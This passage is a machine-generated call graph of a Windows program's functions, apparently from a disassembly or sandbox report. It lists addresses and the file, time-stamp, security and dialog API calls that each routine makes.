GetFileType 10877->10878 10879 4043c2 10878->10879 10879->10873 10881 4098f7 3 API calls 10879->10881 10880->10871 11118 404cf1 10880->11118 10883 4043d3 10881->10883 10886 40b2a9 15 API calls 10883->10886 10884->10837 10887 405898 5 API calls 10884->10887 10889 4043dd 10886->10889 10890 4040d9 10887->10890 10888 404478 10891 4044f2 10888->10891 10898 40451b 10888->10898 10899 40554a 32 API calls 10888->10899 11252 403471 10889->11252 10893 404186 10890->10893 11215 405767 10890->11215 10891->10898 11147 40551c 10891->11147 10893->10837 10900 4041c5 10893->10900 10895 40455d 10911 401264 32 API calls 10895->10911 10918 4045e5 10895->10918 10898->10895 10902 404591 10898->10902 10903 40457a 10898->10903 10899->10891 11227 405a5d 10900->11227 11267 411244 10902->11267 11257 4039b3 10903->11257 10905 4040f3 11221 4057bb 10905->11221 10906 404136 10909 4058ff 6 API calls 10906->10909 10907 4042b7 10907->10871 10915 4098f7 3 API calls 10907->10915 10913 404143 10909->10913 10911->10918 10914 405898 5 API calls 10913->10914 10916 404162 10914->10916 10919 4042dd 10915->10919 10916->10893 10923 40416c 10916->10923 10924 40418f 10916->10924 10917 4040fe 10917->10906 10920 404cf1 54 API calls 10917->10920 10922 4098f7 3 API calls 10918->10922 10926 404640 10918->10926 10921 40b2a9 15 API calls 10919->10921 10927 404132 10920->10927 10936 4042e7 10921->10936 10928 404636 10922->10928 10923->10893 10932 4057e8 3 API calls 10923->10932 10925 4098f7 3 API calls 10924->10925 10929 404199 10925->10929 10926->10834 10930 4046b2 10926->10930 11271 40503e SetEndOfFile 10926->11271 10927->10906 10931 40b2a9 15 API calls 10928->10931 10933 40b2a9 15 API calls 10929->10933 11154 4053c5 10930->11154 10931->10926 10932->10893 10933->10893 10939 4058ff 6 API calls 10936->10939 10937 4046f6 10938 404f2e 30 API calls 10937->10938 10942 404701 10938->10942 10940 404313 10939->10940 10941 404cf1 54 API calls 10940->10941 10943 404341 10941->10943 10942->10834 10944 4057e8 3 API calls 10942->10944 10943->10877 10945 4033db 18 API calls 10943->10945 10944->10834 10945->10871 10947 4076ad 10946->10947 10948 4076bc 10947->10948 11773 40da54 CompareStringA 10947->11773 10948->10665 10951 4077d0 10950->10951 10956 4077d6 10951->10956 11774 40da54 CompareStringA 10951->11774 10953 4077fe 10953->10956 11775 40da54 CompareStringA 10953->11775 10955 40792c 10955->10666 10956->10955 10957 40e144 MultiByteToWideChar 10956->10957 10957->10955 10959 4012aa ctype 2 API calls 10958->10959 10960 401b46 10959->10960 10961 4012aa ctype 2 API calls 10960->10961 10962 401b51 ctype 10961->10962 10964 4050ad 10963->10964 10965 406ea5 GetVersionExA 10964->10965 10966 4050ec 10965->10966 10967 405110 CreateFileA 10966->10967 10968 4050fc CreateFileW 10966->10968 10969 405124 10967->10969 10968->10969 10970 40517f 10969->10970 10971 40e115 WideCharToMultiByte 10969->10971 10970->10720 10971->10970 10975 4033ae 10972->10975 10976 4033b7 10975->10976 10977 4098f7 3 API calls 10976->10977 10978 4033cd 10977->10978 10979 40b2a9 15 API calls 10978->10979 10980 4033d4 10979->10980 10980->10719 10982 4056a2 10981->10982 10986 4056a7 10981->10986 10983 404fdc 31 API calls 10982->10983 10983->10986 10985 4056fa 10985->10724 10986->10985 10987 4056ef 10986->10987 10991 405704 10986->10991 11016 4052d2 10986->11016 11025 403456 10987->11025 10989 4054ed 32 API calls 10989->10991 10990 4052d2 3 API calls 10990->10991 10991->10985 10991->10989 10991->10990 11039 40a1ec GetProcessHeap RtlAllocateHeap 10992->11039 10994 4013bd 10997 404fdc SetFilePointer 10994->10997 10995 403960 10995->10994 10996 403443 30 API calls 10995->10996 10996->10994 10998 40501e 10997->10998 10999 405000 10997->10999 10998->10734 10999->10998 11040 40336d 10999->11040 11002 4054ed 32 API calls 11001->11002 11003 401277 11002->11003 11003->10740 11003->10745 11005 404fdc 31 API calls 11004->11005 11006 40a7fa 11005->11006 11006->10756 11048 405351 11007->11048 11010 405518 11010->10727 11011 40336d 30 API calls 11011->11010 11013 40a82c 11012->11013 11014 40a81f 11012->11014 11013->10748 11015 4054ed 32 API calls 11014->11015 11015->11013 11017 4052e5 GetStdHandle 11016->11017 11018 4052f8 ReadFile 11016->11018 11017->11018 11020 405311 11018->11020 11023 40532c 11018->11023 11030 405051 11020->11030 11022 405318 11022->11023 11024 4052d2 GetFileType 11022->11024 11023->10986 11024->11023 11034 403408 11025->11034 11028 40328f 30 API calls 11029 40346d 11028->11029 11029->10985 11031 405059 11030->11031 11032 40505c GetFileType 11030->11032 11031->11022 11033 405068 11032->11033 11033->11022 11035 4098f7 3 API calls 11034->11035 11036 403413 11035->11036 11037 40b2a9 15 API calls 11036->11037 11038 40341d 11037->11038 11038->11028 11039->10995 11041 403379 11040->11041 11047 40338f 11040->11047 11042 4098f7 3 API calls 11041->11042 11044 403387 11042->11044 11043 40328f 30 API calls 11045 40339b 11043->11045 11046 40b2a9 15 API calls 11044->11046 11045->10998 11046->11047 11047->11043 11049 4053b0 11048->11049 11051 40535e 11048->11051 11049->11010 11049->11011 11050 40538f SetFilePointer 11050->11049 11051->11050 11052 405381 11051->11052 11053 40537a 11051->11053 11057 40554a 11052->11057 11054 404fdc 31 API calls 11053->11054 11056 40537f 11054->11056 11056->11050 11058 40a7e9 31 API calls 11057->11058 11059 40555d 11058->11059 11060 4054ed 32 API calls 11059->11060 11061 40556a 11060->11061 11062 404fdc 31 API calls 11061->11062 11063 405571 11062->11063 11064 40a810 32 API calls 11063->11064 11065 40557d 11064->11065 11065->11056 11067 40df79 3 API calls 11066->11067 11068 40394c 11067->11068 11068->10674 11070 408d22 11069->11070 11071 408d7c 11069->11071 11073 401313 34 API calls 11070->11073 11078 408d57 11070->11078 11072 401313 34 API calls 11071->11072 11071->11078 11074 408d8a 11072->11074 11075 408d49 11073->11075 11076 40568a 35 API calls 11074->11076 11077 40568a 35 API calls 11075->11077 11076->11078 11077->11078 11078->10769 11080 40554a 32 API calls 11079->11080 11081 401b88 11080->11081 11082 4098f7 3 API calls 11081->11082 11085 401bc5 11081->11085 11083 401bbb 11082->11083 11084 40b2a9 15 API calls 11083->11084 11084->11085 11085->10802 11087 40bc5a 11086->11087 11088 40bc8f 11087->11088 11089 40bc84 IsWindowVisible 11087->11089 11091 40bc69 11087->11091 11090 40bc99 DialogBoxParamA 11088->11090 11088->11091 11089->11088 11090->11091 11091->10778 11094 402dd9 11092->11094 11095 402e56 11092->11095 11093 40e144 MultiByteToWideChar 11093->11095 11094->11093 11094->11095 11095->10766 11097 401711 11096->11097 11098 40171a 11096->11098 11099 401313 34 API calls 11097->11099 11098->10820 11099->11098 11100->10821 11102 40568a 35 API calls 11101->11102 11103 405762 11102->11103 11103->10809 11105 402b07 11104->11105 11109 402b6b 11105->11109 11272 402a9e 11105->11272 11107 402b30 11107->11109 11277 407046 11107->11277 11109->10843 11111 40bb61 11110->11111 11112 4098f7 3 API calls 11111->11112 11113 40bb6c 11112->11113 11303 40bb29 wvsprintfA 11113->11303 11116 40a82d 4 API calls 11117 403d92 11116->11117 11117->10837 11117->10850 11117->10854 11119 404d01 11118->11119 11120 405767 3 API calls 11119->11120 11135 404d18 11120->11135 11121 404e52 11122 404e61 11121->11122 11124 4051d8 4 API calls 11121->11124 11128 404292 11122->11128 11306 405b9b 11122->11306 11124->11122 11127 4058ff 6 API calls 11130 404ea4 11127->11130 11128->10871 11246 4033db 11128->11246 11129 405767 3 API calls 11129->11135 11131 404eb5 11130->11131 11132 404eab 11130->11132 11134 405866 3 API calls 11131->11134 11133 4051d8 4 API calls 11132->11133 11133->11128 11134->11128 11135->11121 11135->11128 11135->11129 11140 404d26 11135->11140 11341 404ab4 11135->11341 11138 404e76 11138->11121 11139 404e81 11139->11128 11140->11121 11140->11128 11140->11135 11140->11138 11140->11139 11309 404b4f 11140->11309 11334 40bb8a 11140->11334 11142 409024 11141->11142 11143 409046 11141->11143 11144 402dbd MultiByteToWideChar 11142->11144 11145 402dbd MultiByteToWideChar 11143->11145 11146 409044 11144->11146 11145->11146 11146->10888 11148 405351 32 API calls 11147->11148 11149 40552e 11148->11149 11150 405546 11149->11150 11348 40503e SetEndOfFile 11149->11348 11150->10898 11152 405539 11153 4054ed 32 API calls 11152->11153 11153->11150 11155 4053d7 11154->11155 11156 405416 11155->11156 11349 40de21 SystemTimeToFileTime 11155->11349 11158 405427 11156->11158 11160 40de21 2 API calls 11156->11160 11159 405436 SetFileTime 11158->11159 11161 40de21 2 API calls 11158->11161 11159->10937 11160->11158 11161->11159 11169 41127c 11162->11169 11163 4112fa 11164 404fdc 31 API calls 11163->11164 11165 411304 11164->11165 11166 41131b 11165->11166 11167 40554a 32 API calls 11165->11167 11168 404f2e 30 API calls 11166->11168 11167->11166 11173 411327 11168->11173 11169->11163 11170 4098f7 3 API calls 11169->11170 11171 4112f0 11170->11171 11172 40b2a9 15 API calls 11171->11172 11172->11163 11174 4077c1 2 API calls 11173->11174 11187 41137d 11174->11187 11176 411453 11362 40bd2a 11176->11362 11177 4114a5 11180 4098f7 3 API calls 11177->11180 11182 4114ac 11180->11182 11186 40b2a9 15 API calls 11182->11186 11183 411473 11370 402737 11183->11370 11184 4114e6 11185 401ce5 47 API calls 11184->11185 11192 41147b 11185->11192 11189 4114b9 11186->11189 11187->11177 11190 4077c1 2 API calls 11187->11190 11195 405097 CreateFileW CreateFileA GetVersionExA WideCharToMultiByte 11187->11195 11197 41144a 11187->11197 11352 41125e 11187->11352 11191 405097 4 API calls 11189->11191 11190->11187 11194 4114d1 11191->11194 11198 4054ed 32 API calls 11192->11198 11199 41151e 11192->11199 11193 4114df 11193->10826 11196 4054ed 32 API calls 11194->11196 11195->11187 11196->11193 11355 401851 11197->11355 11198->11199 11199->11193 11200 40554a 32 API calls 11199->11200 11200->11193 11202 403841 11201->11202 11203 403862 11201->11203 11202->11203 11389 403785 11202->11389 11204 403883 11203->11204 11405 40357e 11203->11405 11204->10832 11503 40e087 11207->11503 11209 40e0c3 11209->10869 11211 40e024 2 API calls 11210->11211 11212 40e065 11211->11212 11213 40e024 2 API calls 11212->11213 11214 40e070 11213->11214 11214->10864 11216 406ea5 GetVersionExA 11215->11216 11217 40576c 11216->11217 11218 405787 GetFileAttributesA 11217->11218 11220 40577e GetFileAttributesW 11217->11220 11219 4040ec 11218->11219 11219->10905 11219->10906 11220->11219 11222 406ea5 GetVersionExA 11221->11222 11223 4057c0 11222->11223 11224 4057db GetFileAttributesA 11223->11224 11226 4057d2 GetFileAttributesW 11223->11226 11225 4057e5 11224->11225 11225->10917 11226->11225 11228 406ea5 GetVersionExA 11227->11228 11230 405a6b 11228->11230 11229 405b8c 11229->10837 11230->11229 11231 4057bb 3 API calls 11230->11231 11232 405ab9 11231->11232 11233 405adb 11232->11233 11234 4057e8 3 API calls 11232->11234 11512 407374 11233->11512 11234->11233 11236 405aec CreateFileW 11236->11229 11237 405b10 11236->11237 11238 405b21 11237->11238 11239 40de21 2 API calls 11237->11239 11240 405b32 11238->11240 11241 40de21 2 API calls 11238->11241 11239->11238 11242 405b43 SetFileTime CloseHandle 11240->11242 11243 40de21 2 API calls 11240->11243 11241->11240 11242->11229 11244 405b80 11242->11244 11243->11242 11245 4057e8 3 API calls 11244->11245 11245->11229 11247 4033e4 11246->11247 11248 4098f7 3 API calls 11247->11248 11249 4033fa 11248->11249 11250 40b2a9 15 API calls 11249->11250 11251 403401 11250->11251 11251->10907 11516 403423 11252->11516 11255 40328f 30 API calls 11256 40348a 11255->11256 11256->10873 11258 403952 32 API calls 11257->11258 11259 4039c8 11258->11259 11521 4090ae 11259->11521 11261 403a23 11262 403a2e 11261->11262 11263 40a205 ctype 2 API calls 11261->11263 11262->10895 11263->11262 11265 4039d7 11265->11261 11266 4090ae 54 API calls 11265->11266 11530 409210 11265->11530 11266->11265 11268 41124b 11267->11268 11269 41125b 11268->11269 11572 410d74 11268->11572 11269->10895 11271->10930 11287 402981 11272->11287 11274 402aba 11274->11107 11276 402981 2 API calls 11276->11274 11278 40706e 11277->11278 11285 40713d 11277->11285 11284 407088 11278->11284 11298 406f2b 11278->11298 11281 40709e 11281->11107 11283 407122 11283->11281 11292 406f4d 11283->11292 11284->11281 11284->11283 11284->11285 11286 406f2b CompareStringA 11284->11286 11285->11281 11291 40da75 CompareStringA 11285->11291 11286->11285 11290 40298f 11287->11290 11288 4029bd 11288->11274 11288->11276 11289 407046 2 API calls 11289->11290 11290->11288 11290->11289 11291->11283 11294 406f56 11292->11294 11293 406ef6 CharUpperA 11293->11294 11294->11293 11295 406f90 11294->11295 11296 406fa1 11294->11296 11295->11281 11296->11295 11297 406f4d CharUpperA 11296->11297 11297->11296 11299 406f44 11298->11299 11301 406f3d 11298->11301 11302 40da75 CompareStringA 11299->11302 11301->11284 11302->11301 11304 40ad46 12 API calls 11303->11304 11305 40bb54 11304->11305 11305->11116 11307 4057e8 3 API calls 11306->11307 11308 404e9c 11307->11308 11308->11127 11310 404b5c 11309->11310 11311 406045 11 API calls 11310->11311 11313 404b80 11311->11313 11312 404cd9 ctype 11312->11140 11313->11312 11346 40da54 CompareStringA 11313->11346 11315 404bb9 11315->11312 11347 40da54 CompareStringA 11315->11347 11317 404bd4 11317->11312 11318 40a610 wvsprintfA 11317->11318 11319 405767 3 API calls 11317->11319 11320 404c27 11317->11320 11318->11317 11319->11317 11321 405767 3 API calls 11320->11321 11322 404c35 11321->11322 11322->11312 11323 404c6a MoveFileA 11322->11323 11323->11312 11324 404c84 11323->11324 11325 405767 3 API calls 11324->11325 11326 404c99 11325->11326 11327 404caf MoveFileA 11326->11327 11328 4051d8 4 API calls 11326->11328 11327->11312 11329 404cc3 11327->11329 11330 404cad 11328->11330 11331 404f2e 30 API calls 11329->11331 11330->11327 11332 404cce 11331->11332 11333 404fac 30 API calls 11332->11333 11333->11312 11335 40bb94 11334->11335 11336 40bbc8 DialogBoxParamA 11335->11336 11337 40bc44 SetFileAttributesA 11335->11337 11338 40bc3d 11335->11338 11339 40bbef DialogBoxParamA 11335->11339 11340 40bc0e 11335->11340 11336->11335 11337->11340 11338->11337 11339->11335 11339->11340 11340->11140 11344 404ac7 11341->11344 11342 40a610 wvsprintfA 11342->11344 11343 405767 3 API calls 11343->11344 11344->11342 11344->11343 11345 404ace 11344->11345 11345->11135 11346->11315 11347->11317 11348->11152 11350 40de79 11349->11350 11351 40de7c LocalFileTimeToFileTime 11349->11351 11350->11351 11351->11156 11377 40bd07 DialogBoxParamA 11352->11377 11354 411267 11354->11187 11356 401357 47 API calls 11355->11356 11357 40185d 11356->11357 11358 401872 11357->11358 11359 4098f7 3 API calls 11357->11359 11358->11176 11360 401868 11359->11360 11361 40b2a9 15 API calls 11360->11361 11361->11358 11363 40bd39 11362->11363 11364 4098f7 3 API calls 11363->11364 11365 40bd60 11364->11365 11366 40a610 wvsprintfA 11365->11366 11367 40bd6d 11366->11367 11378 40bcf7 11367->11378 11371 401ce5 47 API calls 11370->11371 11372 402744 11371->11372 11374 402783 11372->11374 11375 401264 32 API calls 11372->11375 11376 401ce5 47 API calls 11372->11376 11381 40ddca 11372->11381 11374->11192 11375->11372 11376->11372 11377->11354 11379 40bb29 13 API calls 11378->11379 11380 40bd02 11379->11380 11380->11183 11380->11184 11382 40ddd3 11381->11382 11383 40dddf 11381->11383 11387 40a6b0 GetTickCount 11382->11387 11388 40a6b0 GetTickCount 11383->11388 11386 40dde9 11386->11372 11387->11383 11388->11386 11390 406ea5 GetVersionExA 11389->11390 11391 403790 11390->11391 11392 403828 11391->11392 11429 402511 11391->11429 11392->11203 11394 4037b4 11404 403803 11394->11404 11464 4034aa 11394->11464 11397 40a205 ctype 2 API calls 11397->11392 11398 4037d4 SetFileSecurityW 11400 4037e8 11398->11400 11399 4037df SetFileSecurityA 11399->11400 11401 4098f7 3 API calls 11400->11401 11400->11404 11402 4037f9 11401->11402 11403 40b2a9 15 API calls 11402->11403 11403->11404 11404->11392 11404->11397 11406 40358b 11405->11406 11407 406ea5 GetVersionExA 11406->11407 11408 403590 11407->11408 11409 40e144 MultiByteToWideChar 11408->11409 11410 40365e ctype 11408->11410 11411 4035a7 11408->11411 11409->11411 11410->11204 11411->11410 11412 406045 11 API calls 11411->11412 11413 40369a 11412->11413 11414 4036b5 11413->11414 11415 4057e8 3 API calls 11413->11415 11416 40e115 WideCharToMultiByte 11414->11416 11415->11414 11417 4036cd 11416->11417 11495 405299 11417->11495 11420 402511 59 API calls 11421 403707 11420->11421 11422 403716 11421->11422 11424 404f2e 30 API calls 11421->11424 11423 40375b 11422->11423 11425 405097 4 API calls 11422->11425 11426 4057e8 3 API calls 11423->11426 11424->11422 11427 403736 11425->11427 11426->11410 11427->11423 11428 40373a SetFileTime 11427->11428 11428->11423 11430 40251e 11429->11430 11431 402533 11430->11431 11439 40255a 11430->11439 11432 4098f7 3 API calls 11431->11432 11433 40253d 11432->11433 11435 40b2a9 15 API calls 11433->11435 11434 4098f7 3 API calls 11436 402722 11434->11436 11438 402547 11435->11438 11437 40b2a9 15 API calls 11436->11437 11437->11438 11438->11394 11439->11438 11440 40fe4c 2 API calls 11439->11440 11459 402713 11439->11459 11441 4025b0 11440->11441 11442 410b78 34 API calls 11441->11442 11443 4025bc 11442->11443 11444 401708 34 API calls 11443->11444 11446 4025cf 11443->11446 11444->11446 11445 402638 11450 4026a2 11445->11450 11451 402699 11445->11451 11446->11445 11447 4026fb 11446->11447 11448 409013 MultiByteToWideChar 11446->11448 11473 41020a 11447->11473 11448->11445 11452 411244 59 API calls 11450->11452 11453 4039b3 59 API calls 11451->11453 11454 4026a0 11452->11454 11453->11454 11455 4026c5 11454->11455 11456 402708 11454->11456 11458 4098f7 3 API calls 11455->11458 11457 41020a 2 API calls 11456->11457 11457->11459 11460 4026d6 11458->11460 11459->11434 11461 40b2a9 15 API calls 11460->11461 11462 4026e0 11461->11462 11462->11447 11463 40dbcb 2 API calls 11462->11463 11463->11447 11465 403553 11464->11465 11466 4034bf GetCurrentProcess OpenProcessToken 11464->11466 11465->11398 11465->11399 11466->11465 11467 4034dd LookupPrivilegeValueA 11466->11467 11468 403509 AdjustTokenPrivileges 11467->11468 11469 40352b LookupPrivilegeValueA 11467->11469 11468->11469 11470 40351a 11468->11470 11471 403548 CloseHandle 11469->11471 11472 40353b AdjustTokenPrivileges 11469->11472 11470->11469 11471->11465 11472->11471 11474 410226 11473->11474 11475 410217 11473->11475 11476 41018e 2 API calls 11474->11476 11475->11474 11489 40a65b 11475->11489 11478 41022e 11476->11478 11479 4012aa ctype 2 API calls 11478->11479 11480 410239 11479->11480 11481 4012aa ctype 2 API calls 11480->11481 11482 410244 11481->11482 11483 4012aa ctype 2 API calls 11482->11483 11484 41024f 11483->11484 11492 407ae8 11484->11492 11490 40a205 ctype 2 API calls 11489->11490 11491 40a666 11490->11491 11491->11474 11493 40a65b ctype 2 API calls 11492->11493 11494 407af3 11493->11494 11496 4051d8 4 API calls 11495->11496 11497 4052aa 11496->11497 11499 4036f2 11497->11499 11500 40349c 11497->11500 11499->11420 11499->11422 11501 4033db 18 API calls 11500->11501 11502 4034a7 11501->11502 11502->11499 11508 40e024 11503->11508 11505 40e095 11506 40e024 2 API calls 11505->11506 11507 40e0a0 11506->11507 11507->11209 11509 40e030 11508->11509 11510 40e036 11508->11510 11509->11505 11511 40de21 2 API calls 11510->11511 11511->11509 11513 40737e 11512->11513 11514 407384 11513->11514 11515 40e144 MultiByteToWideChar 11513->11515 11514->11236 11515->11514 11517 4098f7 3 API calls 11516->11517 11518 40342e 11517->11518 11519 40b2a9 15 API calls 11518->11519 11520 403438 11519->11520 11520->11255 11522 409194 11521->11522 11528 4090cd 11521->11528 11524 4091c8 11522->11524 11536 408f88 11522->11536 11525 40ddca GetTickCount 11524->11525 11526 4091f9 11525->11526 11526->11265 11527 40568a 35 API calls 11527->11528 11528->11522 11528->11526 11528->11527 11529 41126f 53 API calls 11528->11529 11529->11528 11531 409240 11530->11531 11533 409229 11530->11533 11531->11533 11550 405585 11531->11550 11534 40ddca GetTickCount 11533->11534 11535 409278 11534->11535 11535->11265 11537 408f91 11536->11537 11539 408fed 11536->11539 11537->11539 11540 40b305 11537->11540 11539->11524 11545 40b283 11540->11545 11542 40b31a 11543 40a82d 4 API calls 11542->11543 11544 40b31f 11543->11544 11544->11539 11548 40a8f1 11545->11548 11549 40a8fe SendDlgItemMessageA 11548->11549 11549->11542 11551 40567f 11550->11551 11552 405596 11550->11552 11551->11533 11553 4055a9 GetStdHandle 11552->11553 11561 4055b2 11552->11561 11553->11561 11554 405601 WriteFile 11554->11561 11555 4055d7 11556 4055d9 WriteFile 11555->11556 11555->11561 11556->11555 11556->11561 11558 405672 11559 403471 30 API calls 11558->11559 11559->11551 11560 404fdc 31 API calls 11560->11561 11561->11551 11561->11554 11561->11555 11561->11556 11561->11558 11561->11560 11562 4054ed 32 API calls 11561->11562 11563 403304 11561->11563 11562->11561 11564 403313 11563->11564 11565 403367 11563->11565 11566 4098f7 3 API calls 11564->11566 11565->11561 11567 40331f 11566->11567 11568 40a610 wvsprintfA 11567->11568 11569 40332c 11568->11569 11570 4098f7 3 API calls 11569->11570 11571 403340 MessageBoxA SetLastError 11570->11571 11571->11565 11574 410d89 11572->11574 11573 410a90 2 API calls 11576 410df1 11573->11576 11574->11573 11589 410e16 11574->11589 11575 40e95b 54 API calls 11575->11589 11615 40e95b 11576->11615 11578 410ee2 11604 410748 11578->11604 11579 410748 44 API calls 11579->11589 11581 41121e 11581->11269 11583 411227 11652 40f9e1 11583->11652 11588 40ff05 54 API calls 11588->11589 11589->11575 11589->11578 11589->11579 11589->11581 11589->11583 11589->11588 11591 40fc8d 54 API calls 11589->11591 11592 410bbe 11589->11592 11628 410cb3 11589->11628 11648 41026d 11589->11648 11591->11589 11593 410bce 11592->11593 11594 403952 32 API calls 11593->11594 11599 410c31 11594->11599 11595 410c7c 11657 4102ca 11595->11657 11598 40e95b 54 API calls 11598->11599 11599->11595 11599->11598 11602 410ca1 11599->11602 11600 410c9a 11600->11589 11601 40a205 ctype 2 API calls 11601->11600 11602->11600 11603 40a205 ctype 2 API calls 11602->11603 11603->11600 11605 410a44 11604->11605 11610 410777 11604->11610 11606 40fb53 38 API calls 11605->11606 11608 410a52 11606->11608 11608->11581 11609 40faf1 36 API calls 11609->11610 11610->11605 11610->11608 11610->11609 11611 409210 38 API calls 11610->11611 11612 401708 34 API calls 11610->11612 11613 40dbcb GetProcessHeap RtlFreeHeap 11610->11613 11614 40fee6 GetProcessHeap RtlFreeHeap 11610->11614 11719 40fb53 11610->11719 11611->11610 11612->11610 11613->11610 11614->11610 11616 40e96d 11615->11616 11618 40e971 11615->11618 11616->11581 11616->11589 11619 40ff05 11616->11619 11617 4090ae 54 API calls 11617->11616 11618->11617 11620 40ff1e 11619->11620 11622 40ff23 11619->11622 11621 40e95b 54 API calls 11620->11621 11621->11622 11623 40ff49 11622->11623 11625 40ff68 ctype 11622->11625 11627 40ff63 11622->11627 11732 40fbea 11623->11732 11626 40e95b 54 API calls 11625->11626 11625->11627 11626->11625 11627->11589 11767 40fc8d 11628->11767 11631 410cd5 11631->11589 11632 410cf5 11635 410cec 11632->11635 11636 40fc8d 54 API calls 11632->11636 11633 410ce5 11634 40fc8d 54 API calls 11633->11634 11634->11635 11635->11631 11637 403952 32 API calls 11635->11637 11638 410d01 11636->11638 11643 410d20 11637->11643 11638->11631 11640 40fc8d 54 API calls 11638->11640 11639 410d41 11642 4102ca 36 API calls 11639->11642 11640->11635 11641 40fc8d 54 API calls 11641->11643 11644 410d4e 11642->11644 11643->11639 11643->11641 11645 410d61 11643->11645 11644->11631 11646 40a205 ctype 2 API calls 11644->11646 11645->11631 11647 40a205 ctype 2 API calls 11645->11647 11646->11631 11647->11631 11650 410276 11648->11650 11649 4102bc 11649->11589 11650->11649 11651 40ff05 54 API calls 11650->11651 11651->11649 11653 40e546 2 API calls 11652->11653 11654 40f9f2 11653->11654 11655 40e55a 34 API calls 11654->11655 11656 40f9fb 11655->11656 11656->11578 11658 40609f 2 API calls 11657->11658 11659 4102dd 11658->11659 11696 407afc 11659->11696 11661 41030c 11663 41032b 11661->11663 11666 41018e 2 API calls 11661->11666 11662 4105ec 11710 4060b4 11662->11710 11663->11662 11664 40a668 2 API calls 11663->11664 11668 41036b 11664->11668 11666->11663 11667 4105f4 11667->11600 11667->11601 11668->11662 11669 40eb33 34 API calls 11668->11669 11670 4103e6 11668->11670 11671 41039d 11669->11671 11672 40eb33 34 API calls 11670->11672 11677 41045c ctype 11670->11677 11673 40a668 2 API calls 11671->11673 11672->11677 11674 4103a4 11673->11674 11675 40eb33 34 API calls 11674->11675 11675->11670 11676 4105e0 11678 410628 11676->11678 11679 401313 34 API calls 11676->11679 11677->11662 11677->11676 11682 403952 32 API calls 11677->11682 11680 40dbcb 2 API calls 11678->11680 11693 41064e ctype 11678->11693 11679->11678 11681 410645 11680->11681 11683 401313 34 API calls 11681->11683 11687 41058f 11682->11687 11683->11693 11684 4105c3 11700 408974 11684->11700 11685 4105e2 11685->11662 11689 40a205 ctype 2 API calls 11685->11689 11687->11684 11687->11685 11689->11662 11690 40a205 ctype 2 API calls 11690->11676 11691 410739 11692 4060b4 2 API calls 11691->11692 11692->11667 11693->11662 11693->11691 11694 401313 34 API calls 11693->11694 11695 410700 11693->11695 11694->11695 11695->11662 11695->11691 11697 407b0f 11696->11697 11698 407b05 11696->11698 11697->11661 11699 40a668 2 API calls 11698->11699 11699->11697 11703 40898f 11700->11703 11701 408b9d 11702 407cf7 34 API calls 11701->11702 11705 408ba6 11702->11705 11703->11701 11708 4089ea 11703->11708 11713 407cf7 11703->11713 11705->11676 11705->11690 11706 407cf7 34 API calls 11709 408a8e 11706->11709 11707 401313 34 API calls 11707->11708 11708->11701 11708->11707 11708->11709 11709->11701 11709->11706 11711 40a65b ctype 2 API calls 11710->11711 11712 4060bc 11711->11712 11712->11667 11714 407d0b 11713->11714 11715 407d38 11713->11715 11716 40a224 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapReAlloc 11714->11716 11715->11708 11717 407d28 11716->11717 11717->11715 11718 403443 30 API calls 11717->11718 11718->11715 11720 40fb63 11719->11720 11721 40fb9e 11719->11721 11720->11721 11723 40fb6c 11720->11723 11722 40e9d5 38 API calls 11721->11722 11724 40fb95 11722->11724 11728 40e9d5 11723->11728 11724->11610 11727 40e9d5 38 API calls 11727->11724 11729 40e9f5 11728->11729 11731 40ea1f 11728->11731 11730 409210 38 API calls 11729->11730 11729->11731 11730->11731 11731->11727 11746 40fab8 11732->11746 11735 40fab8 54 API calls 11736 40fc11 11735->11736 11737 40fab8 54 API calls 11736->11737 11739 40fc21 11736->11739 11745 40fc5a 11736->11745 11737->11739 11750 40fbb6 11739->11750 11741 40fc55 11754 40e546 11741->11754 11742 40fc69 11758 40e55a 11742->11758 11745->11627 11747 40fac3 11746->11747 11748 40fac8 11746->11748 11749 40e95b 54 API calls 11747->11749 11748->11735 11748->11736 11749->11748 11751 40fbcf 11750->11751 11752 40fab8 54 API calls 11751->11752 11753 40fbe5 11751->11753 11752->11751 11753->11741 11753->11742 11753->11745 11755 40e559 11754->11755 11756 40e54b 11754->11756 11755->11745 11757 40a205 ctype 2 API calls 11756->11757 11757->11755 11759 40e56d 11758->11759 11765 40e569 11758->11765 11760 40e546 2 API calls 11759->11760 11761 40e573 11760->11761 11766 40a1ec GetProcessHeap RtlAllocateHeap 11761->11766 11763 40e589 11764 403443 30 API calls 11763->11764 11763->11765 11764->11765 11765->11745 11766->11763 11768 40fca1 11767->11768 11770 40fcc6 11767->11770 11769 40fab8 54 API calls 11768->11769 11768->11770 11772 40fd01 11768->11772 11769->11768 11770->11631 11770->11632 11770->11633 11771 40fab8 54 API calls 11771->11772 11772->11770 11772->11771 11773->10948 11774->10953 11775->10956 11777 40aca1 3 API calls 11776->11777 11778 40ad2e 11777->11778 11779 40ad3a 11778->11779 11780 40ace4 3 API calls 11778->11780 11779->10281 11779->10282 11780->11779 11781->10285 11783 40ad13 11782->11783 11784 40aced GetDC 11782->11784 11783->10291 11784->11783 11785 40acfc GetDeviceCaps ReleaseDC 11784->11785 11785->11783 11787 40acd0 11786->11787 11788 40acaa GetDC 11786->11788 11787->10291 11788->11787 11789 40acb9 GetDeviceCaps ReleaseDC 11788->11789 11789->11787 11791 40ac23 11790->11791 11792 40ac26 9 API calls 11790->11792 11791->11792 11792->10294 11794 4051ac 22 API calls 11793->11794 11795 401894 11794->11795 11796 401357 47 API calls 11795->11796 11797 401898 11795->11797 11798 4018a5 11796->11798 11804 4018cb 11797->11804 11798->11797 11799 4098f7 3 API calls 11798->11799 11800 4018b0 11799->11800 11801 40b2a9 15 API calls 11800->11801 11802 4018ba 11801->11802 11803 404f2e 30 API calls 11802->11803 11803->11797 11805 4018e4 11804->11805 11825 4018dd 11804->11825 11806 40a7e9 31 API calls 11805->11806 11807 4018ee 11806->11807 11808 40197f 11807->11808 11809 4018ff 11807->11809 11811 4054ed 32 API calls 11808->11811 11810 4054ed 32 API calls 11809->11810 11812 401910 11810->11812 11813 401998 11811->11813 11814 401ce5 47 API calls 11812->11814 11835 402790 11813->11835 11816 401917 11814->11816 11818 401921 OemToCharBuffA 11816->11818 11819 40196c 11816->11819 11818->11819 11822 401934 11818->11822 11821 40a810 32 API calls 11819->11821 11820 4019b5 11824 40a810 32 API calls 11820->11824 11821->11825 11868 4016bf 11822->11868 11824->11825 11825->10313 11825->10317 11830 40e144 MultiByteToWideChar 11831 401955 11830->11831 11832 401708 34 API calls 11831->11832 11833 40195d 11832->11833 11834 4016bf 34 API calls 11833->11834 11834->11819 11837 402796 11835->11837 11836 401ce5 47 API calls 11836->11837 11837->11836 11838 401264 32 